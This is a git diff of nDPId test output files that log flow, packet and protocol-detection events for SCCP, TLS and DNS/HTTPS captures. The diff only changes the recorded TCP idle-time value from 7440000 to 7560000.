+00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-data-len":596,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1557178511908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
~~ packets captured/processed: 17/17 diff --git a/test/results/selfsigned.pcap.out b/test/results/selfsigned.pcap.out index d73071f79..667607715 100644 --- a/test/results/selfsigned.pcap.out +++ b/test/results/selfsigned.pcap.out 
@@ -1,12 +1,12 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"selfsigned.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1588921646472} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588921646472,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1588921646472,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} 
-01039{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588921646472,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1588921646472,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} 
+01039{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-data-len":2634,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1588921646517} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 diff --git a/test/results/signal.pcap.out b/test/results/signal.pcap.out index 177f818ce..255336672 100644 --- a/test/results/signal.pcap.out +++ b/test/results/signal.pcap.out 
@@ -6,132 +6,132 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569051247593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569051247593,"pkt":"xiwDYGpkxGGLNYKpCABFAABHd8wAAP8RvnbAqAIRwKgCAe15ADUAM\/YJyvgBAAABAAAAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569051247599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247599,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN66AbtonqfVAAAAALAC\/\/\/ZywAAAgQFtAEDAwcBAQgKKFVR7gAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247600,"flow_last_seen":1569051247600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247600,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569051247600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247600,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd67AbuyrbdxAAAAALAC\/\/+b2AAAAgQFtAEDAwcBAQgKKFVR7wAAAAAEAgAA"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247601,"flow_last_seen":1569051247601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569051247601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247601,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd68AbvGwW2DAAAAALAC\/\/\/RsAAAAgQFtAEDAwcBAQgKKFVR8AAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569051247599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247599,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN66AbtonqfVAAAAALAC\/\/\/ZywAAAgQFtAEDAwcBAQgKKFVR7gAAAAAEAgAA"} 